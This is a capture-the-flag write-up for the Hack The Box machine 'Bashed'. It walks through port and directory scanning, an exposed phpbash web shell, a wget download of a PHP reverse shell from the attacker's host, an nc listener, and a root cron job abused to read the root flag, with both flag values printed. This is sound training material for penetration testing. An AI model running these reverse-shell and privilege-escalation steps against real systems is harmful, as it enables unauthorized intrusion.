Bashed - Write Up

Machine IP - 10.10.10.68

Initial Phase

Starting with an nmap scan, which gives the same result for both the fast as well as full port scan -

root@kali:~/Desktop/Hack The Box/bashed# nmap -F 10.10.10.68 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-22 14:10 +04 Nmap scan report for 10.10.10.68 Host is up (0.23s latency). Not shown: 99 closed ports PORT STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 2.41 seconds

Going to the website, we see a page of phpbash. The developer has mentioned on the website that the phpbash server has been set up on the current server itself. Starting a directory search on the server -

root@kali:~# uniscan -qweu http://10.10.10.68 #################################### # Uniscan project # # http://uniscan.sourceforge.net/ # #################################### V. 6.3 Scan date: 8-5-2019 12:22:35 =================================================================================================== | Domain: http://10.10.10.68/ | Server: Apache/2.4.18 (Ubuntu) | IP: 10.10.10.68 =================================================================================================== | Directory check: | [+] CODE: 200 URL: http://10.10.10.68/css/ | [+] CODE: 200 URL: http://10.10.10.68/dev/ | [+] CODE: 200 URL: http://10.10.10.68/fonts/ | [+] CODE: 200 URL: http://10.10.10.68/images/ | [+] CODE: 200 URL: http://10.10.10.68/js/ | [+] CODE: 200 URL: http://10.10.10.68/php/ | [+] CODE: 200 URL: http://10.10.10.68/uploads/ =================================================================================================== | File check: | [+] CODE: 200 URL: http://10.10.10.68/config.php | [+] CODE: 200 URL: http://10.10.10.68/css | [+] CODE: 200 URL: http://10.10.10.68/index.html | [+] CODE: 200 URL: http://10.10.10.68/js =================================================================================================== | Check robots.txt: | Check sitemap.xml: =================================================================================================== =================================================================================================== Scan end date: 8-5-2019 12:25:59

Thee above shows the dev directory, which seems to have the php files which run the phpbash. So, navigating to the phpbash.php file inside the dev directory, we can start bash on the server as www-data user.

Exploit Phase

The www-data user has the permissions to access the filesystem at a given privilege level. Therefore, trying to reach a user directory, we see that the user flag can be read easily.

www-data@bashed:/var/www/html/dev# ls -la total 28 drw-r-xr-x 2 root root 4096 Dec 4 2017 . drw-r-xr-x 10 root root 4096 Dec 4 2017 .. -rw-r-xr-x 1 root root 4688 Dec 4 2017 phpbash.min.php -rw-r-xr-x 1 root root 8280 Nov 30 2017 phpbash.php www-data@bashed:/var/www/html/dev# cd / www-data@bashed:/# cd home www-data@bashed:/home# ls -la total 16 drwxr-xr-x 4 root root 4096 Dec 4 2017 . drwxr-xr-x 23 root root 4096 Dec 4 2017 .. drwxr-xr-x 4 arrexel arrexel 4096 Dec 4 2017 arrexel drwxr-xr-x 3 scriptmanager scriptmanager 4096 Dec 4 2017 scriptmanager www-data@bashed:/home# cd arrexel www-data@bashed:/home/arrexel# ls -la total 36 drwxr-xr-x 4 arrexel arrexel 4096 Dec 4 2017 . drwxr-xr-x 4 root root 4096 Dec 4 2017 .. -rw------- 1 arrexel arrexel 1 Dec 23 2017 .bash_history -rw-r--r-- 1 arrexel arrexel 220 Dec 4 2017 .bash_logout -rw-r--r-- 1 arrexel arrexel 3786 Dec 4 2017 .bashrc drwx------ 2 arrexel arrexel 4096 Dec 4 2017 .cache drwxrwxr-x 2 arrexel arrexel 4096 Dec 4 2017 .nano -rw-r--r-- 1 arrexel arrexel 655 Dec 4 2017 .profile -rw-r--r-- 1 arrexel arrexel 0 Dec 4 2017 .sudo_as_admin_successful -r--r--r-- 1 arrexel arrexel 33 Dec 4 2017 user.txt www-data@bashed:/home/arrexel# cat user.txt 2c281f318555dbc1b856957c7147bfc1

Thus we obtain the user flag.

Now, moving on to the root exploitation. The output of sudo -l gives the following -

www-data@bashed:/var/www/html/dev# sudo -l Matching Defaults entries for www-data on bashed: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on bashed: (scriptmanager : scriptmanager) NOPASSWD: ALL

Therefore, we can execute anything as scriptmanager. Trying this as follows -

www-data@bashed:/var/www/html/dev# sudo -u scriptmanager whoami scriptmanager www-data@bashed:/var/www/html/dev# sudo -u scriptmanager bash www-data@bashed:/var/www/html/dev#

We are unable to get a shell as the user scriptmanager, but when executing a one-liner, we get the output that confirms execution as scriptmanager. This may be so because the phpbash shell may not be a persistent shell instead a program that spawns multiple shells for each command passed. Therefore, we should get a reverse shell. But trying the usual nc, bash tcp, and other one liners do not open a stay-alive connection to the shell. Therefore, we must execute a reverse shell from the machine itself to our IP. Thus we need to locate a directory where we can write, read and execute. The directory found by uniscan, uploads may be the required directory as generally all folders where we upload files are rwx by default. Therfore, navigating and confirming this is next.

www-data@bashed:/var/www/html/dev# cd /var/www/html www-data@bashed:/var/www/html# ls -la total 116 drw-r-xr-x 10 root root 4096 Dec 4 2017 . drwxr-xr-x 3 root root 4096 Dec 4 2017 .. -rw-r-xr-x 1 root root 8193 Dec 4 2017 about.html -rw-r-xr-x 1 root root 94 Dec 4 2017 config.php -rw-r-xr-x 1 root root 7805 Dec 4 2017 contact.html drw-r-xr-x 2 root root 4096 Dec 4 2017 css drw-r-xr-x 2 root root 4096 Dec 4 2017 demo-images drw-r-xr-x 2 root root 4096 Dec 4 2017 dev drw-r-xr-x 2 root root 4096 Dec 4 2017 fonts drw-r-xr-x 2 root root 4096 Dec 4 2017 images -rw-r-xr-x 1 root root 7743 Dec 4 2017 index.html drw-r-xr-x 2 root root 4096 Dec 4 2017 js drw-r-xr-x 2 root root 4096 Dec 4 2017 php -rw-r-xr-x 1 root root 10863 Dec 4 2017 scroll.html -rw-r-xr-x 1 root root 7477 Dec 4 2017 single.html -rw-r-xr-x 1 root root 24164 Dec 4 2017 style.css drwxrwxrwx 2 root root 4096 May 8 00:43 uploads

Thus the folder has the required permissions and can be used to hold the reverse shell code. To upload a reverse shell, we search kali for php-reverse and get the following -

root@kali:~# locate -A php reverse /usr/share/beef-xss/modules/exploits/m0n0wall/php-reverse-shell.php /usr/share/doc/metasploit-framework/modules/payload/php/meterpreter/reverse_tcp.md /usr/share/laudanum/php/php-reverse-shell.php /usr/share/laudanum/wordpress/templates/php-reverse-shell.php /usr/share/metasploit-framework/lib/msf/core/payload/php/reverse_tcp.rb /usr/share/metasploit-framework/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb /usr/share/metasploit-framework/modules/payloads/singles/php/meterpreter_reverse_tcp.rb /usr/share/metasploit-framework/modules/payloads/singles/php/reverse_perl.rb /usr/share/metasploit-framework/modules/payloads/singles/php/reverse_php.rb /usr/share/metasploit-framework/modules/payloads/stagers/php/reverse_tcp.rb /usr/share/metasploit-framework/modules/payloads/stagers/php/reverse_tcp_uuid.rb /usr/share/webshells/php/php-reverse-shell.php

We can use an apt reverse shell from this to upload to the server. Therefore, we copy the laudanum reverse shell to the current directory and start a python server using python3 -m http.server 80. Fro the web shell interface, we download the script using wget http://10.10.14.68/php-reverse-shell.php.

Now, we have the reverse shell on the machine in the uploads directory. We can start the reverse shell by using nc -lvp 10023 on attacking machine and then navigating to the aptly modified script on the browser at http://10.10.10.68/uploads/php-reverse-shell.php. Using python to import a pty shell and then using stty raw -echo to make the shell persistent, we can then export env variable as export TERM=screen for ease of use with vim, nano etc. And then we have a shell. Here we proceed as follows -

root@kali:~# nc -lvp 10023 listening on [any] 10023 ... 10.10.10.68: inverse host lookup failed: Unknown host connect to [10.10.14.68] from (UNKNOWN) [10.10.10.68] 58372 Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 02:44:10 up 1 day, 6:52, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python -c 'import pty;pty.spawn("/bin/bash")' www-data@bashed:/$ ^Z [1]+ Stopped nc -lvp 10023 root@kali:~# stty raw -echo root@kali:~# nc -lvp 10023 www-data@bashed:/$ ls -la total 88 drwxr-xr-x 23 root root 4096 Dec 4 2017 . drwxr-xr-x 23 root root 4096 Dec 4 2017 .. drwxr-xr-x 2 root root 4096 Dec 4 2017 bin drwxr-xr-x 3 root root 4096 Dec 4 2017 boot drwxr-xr-x 19 root root 4240 May 6 19:52 dev drwxr-xr-x 89 root root 4096 Dec 4 2017 etc drwxr-xr-x 4 root root 4096 Dec 4 2017 home lrwxrwxrwx 1 root root 32 Dec 4 2017 initrd.img -> boot/initrd.img-4.4.0-62-generic drwxr-xr-x 19 root root 4096 Dec 4 2017 lib drwxr-xr-x 2 root root 4096 Dec 4 2017 lib64 drwx------ 2 root root 16384 Dec 4 2017 lost+found drwxr-xr-x 4 root root 4096 Dec 4 2017 media drwxr-xr-x 2 root root 4096 Feb 15 2017 mnt drwxr-xr-x 2 root root 4096 Dec 4 2017 opt dr-xr-xr-x 121 root root 0 May 6 19:52 proc drwx------ 3 root root 4096 Dec 4 2017 root drwxr-xr-x 18 root root 520 May 7 06:25 run drwxr-xr-x 2 root root 4096 Dec 4 2017 sbin drwxrwxr-- 2 scriptmanager scriptmanager 4096 May 8 01:14 scripts drwxr-xr-x 2 root root 4096 Feb 15 2017 srv dr-xr-xr-x 13 root root 0 May 7 23:05 sys drwxrwxrwt 10 root root 4096 May 8 02:44 tmp drwxr-xr-x 10 root root 4096 Dec 4 2017 usr drwxr-xr-x 12 root root 4096 Dec 4 2017 var lrwxrwxrwx 1 root root 29 Dec 4 2017 vmlinuz -> boot/vmlinuz-4.4.0-62-generic www-data@bashed:/$ sudo -u scriptmanager bash scriptmanager@bashed:/$ scriptmanager@bashed:/$ whoami scriptmanager scriptmanager@bashed:/$ cd scripts scriptmanager@bashed:/scripts$ ls -la total 16 drwxrwxr-- 2 scriptmanager scriptmanager 4096 May 8 01:14 . drwxr-xr-x 23 root root 4096 Dec 4 2017 .. -rw-r--r-- 1 scriptmanager scriptmanager 60 May 8 01:14 test.py -rw-r--r-- 1 root root 12 May 8 02:45 test.txt scriptmanager@bashed:/scripts$ cat test.txt testing 123!scriptmanager@bashed:/scripts$ cat test.py f = open("test.txt", "w") f.write("testing 123!") f.close()

From the file, we see that the file has the owner 'root'. Also, it is apparent that the file is being written by the code test.py, which is owned by scriptmanager. Doing an ls -la again shows that the txt file is being modified every minute. This may be a result of the possibility that the root user has a cron job for the script owned by scriptmanager running, which causes the file to be written with the root being the owner as it is executed by root. If this is the case, then we found the vulnerability and can exploit this. Therfore, this can be changed to get a root reverse shell using python scripts or in this case simply read the root flag. The location of the root flag is in the root directory. Therefore, we can modify the code to the following -

f = open("test.txt", "w") d = open("/root/root.txt", "r") x = d.read() f.write(x) f.close() d.close()

This can be done by nano, however, an export TERM=screen would be required for executing nano. After this is done, we simply wait or the cron job to execute the file again and then we get the following -

scriptmanager@bashed:/scripts$ ls -la total 16 drwxrwxr-- 2 scriptmanager scriptmanager 4096 May 8 02:52 . drwxr-xr-x 23 root root 4096 Dec 4 2017 .. -rw-r--r-- 1 scriptmanager scriptmanager 102 May 8 02:52 test.py -rw-r--r-- 1 root root 33 May 8 02:53 test.txt scriptmanager@bashed:/scripts$ cat test.txt cc4f0afe3a1026d402ba10329674a8e2

Thus, we get the root flag.